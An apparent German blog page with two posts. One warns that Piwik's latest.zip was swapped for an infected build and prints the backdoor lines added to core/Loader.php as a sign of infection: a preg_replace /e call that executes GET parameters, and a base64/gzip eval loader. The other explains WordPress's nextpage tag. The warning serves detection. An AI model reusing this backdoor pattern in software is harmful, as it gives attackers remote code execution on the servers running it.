Infizierte Version von Piwik entdeckt

Wie im Piwik Forum zu lesen ist (Link), ist eine infizierte Version von Piwik im Umlauf. Die latest.zip auf dem Piwik Download Server wurde gegen eine infizierte Version ausgetauscht.

Erkennbar ist dies, wenn sich die Datei „piwik/core/DataTable/Filter/Megre.php“ auf dem Server befindet und die letzten Zeilen von „piwik/core/Loader.php“ in etwa so aussehen:

Error_Reporting(0); 	
if(isset($_GET['g']) && isset($_GET['s'])) {
    preg_replace("/(.+)/e", $_GET['g'], 'dwm');     
    exit;
  }
  if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode(.....

Leider wurde bisher offiziell nicht gewarnt, also zum Beispiel im Blog, der auch per RSS erreichbar ist.

WordPress Blog Posts auf mehrere Seiten verteilen

Eigentlich sollte ein Blog Post nicht zu lang sein, weil er sonst nicht komplett gelesen wird. Aber z. B. bei Tutorials ist das gar nicht möglich sich kurz zu fassen. Aber alles auf einer Seite ist auch anstrengend, daher kann man mit einem Tag WordPress dazu veranlassen einen Paginator anzuzeigen und den Post auf mehrere Seiten zu verteilen.

Dazu wechselt mal in die HTML Ansicht und gibt dort wo der Post unterbrochen werden soll folgendes ein:

<!--nextpage-->